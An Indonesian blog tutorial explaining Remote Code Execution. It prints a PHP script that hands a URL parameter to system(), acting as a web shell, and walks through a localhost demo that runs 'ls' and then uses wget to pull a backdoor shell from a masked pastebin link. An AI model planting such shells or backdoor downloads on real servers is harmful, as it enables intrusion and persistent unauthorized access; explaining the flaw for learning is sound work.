Skip to main content

Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja?

Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.
Labels:

Comments

Post a Comment

Popular posts from this blog

Jasa Fogging Nyamuk Murah Bandung | 0857-4789-0221 - Garda Pest

  Memerlukan informasi tentang   Jasa Fogging Nyamuk Murah Bandung   ?   Garda pest Control Perusahaan pengendalian hama dan disinfeksi virus yang profesional dan untuk harga pasti terjangkau, dengan Layanan Cepat Berkualitas kami manjamin kepuasan pelanggan. Jasa Fogging Nyamuk Murah Bandung dan Berkualitas Artikel Lainya Tentang :  Virus Varian Terbaru Waspada Penularan Nyamuk Demam Berdarah (DBD) Waspada nyamuk di rumah Anda, mencegah lebih baik daripada mengobati. Lakukan tindakan pencegahan untuk mencegah populasi nyamuk dewasa dengan 3M Plus dan layanan gerimis nyamuk. Pilih layanan yang terbaik dan profesional, Dengan banyaknya perusahaan jasa fogging nyamuk murah dengan hasil yang mengecewakan kami sarankan pilihlah jasa yang profesional berpengalaman di bidang pengendalian hama. Garda Pest Control memiliki pengalaman lebih dari 10 tahun dalam pengendalian hama. Baca Juga Artikel Tentang :  Cara Mengusir Nyamuk di Rumah Mengapa Jasa Garda Pest Contr...
Post a Comment
Read more

WA:0813-1344-4221 Jasa Disinfektan Covid Ciparigi Bogor

Hub: 0813-1344-4221 Jasa Disinfektan Covid Ciparigi Bogor, Jasa Semprot Disinfektan Ciparigi Bogor, Jasa Semprot Disinfektan Untuk Rumah Ciparigi Bogor, Jasa Semprot Disinfektan Untuk Rumah Ciparigi Bogor, Jasa Semprot Disinfektan di Ciparigi Bogor, Jasa Penyemprotan Disinfektan Ciparigi Bogor. Kami Juga melayani Jasa Fogging Nyamuk Tangerang, Jasa Fogging Nyamuk di Bali, Jasa Pembasmi Tikus Jogja, Jasa Pembasmi Tikus Solo, Jasa Pembasmi Tikus di Jogja, Jasa Pembasmi Kecoa di Apartement, Jasa Anti Rayap Bsd, Jasa Anti Rayap di Yogyakarta, Jasa Pembasmi Rayap di Cirebon dll...? Garda Pest Control ahlinya Proses sanitasi ketika penyemprotan disinfektan khusus sangat diperlukan untuk membersihkan ruangan dari beberapa virus, bakteri dan kuman yang membahayakan kesehatan. Secara teknis, keberadaan virus harus diamati meskipun bahkan ruang pribadi. Terutama dalam suasana pandemi ini. Karena beberapa jenis virus dapat memasuki tubuh kita, terutama dengan perantara udara inhalasi. Jika ruanga...
Post a Comment
Read more

Staycation Surabaya: Hotel Swiss Belinn Manyar

Little A jumping on the bed Senin pagi, ketika kami pulang dari berakhir pekan di Malang, kami mendapati jalan di depan rumah kami sudah dipasangi terop. Rupanya tetangga mau punya hajatan. Acaranya mulai jam 6 sore. Kami tahunya juga dari spanduk yang terpasang karena si tetangga tidak bilang permisi sama sekali ke kami. Yo wes, nanti tinggal pergi aja sorenya biar nggak pusing kena bising. E ternyata cek sound sudah dimulai jam 9 pagi, dengan suara dentuman speaker raksasa yang menggetarkan jendela rumah kami. Little A yang kebetulan libur karena ada UN SD sampai takut dan teriak-teriak. Waduh, kalau begini caranya harus keluar rumah nih, sebelum gendang telinga kami meledak. Saya dengan cepat mengais-ngais promo/kupon/poin yang saya punya untuk booking hotel. Mendadak Staycation ! Saya ingat punya voucher dari apps booking hotel di HOTELQUICKLY. Apps yang bisa dipasang di iOS maupun Android ini memang khusus untuk pemesanan hotel yang mendadak, untuk malam ini atau besok malam. Jad...
Post a Comment
Read more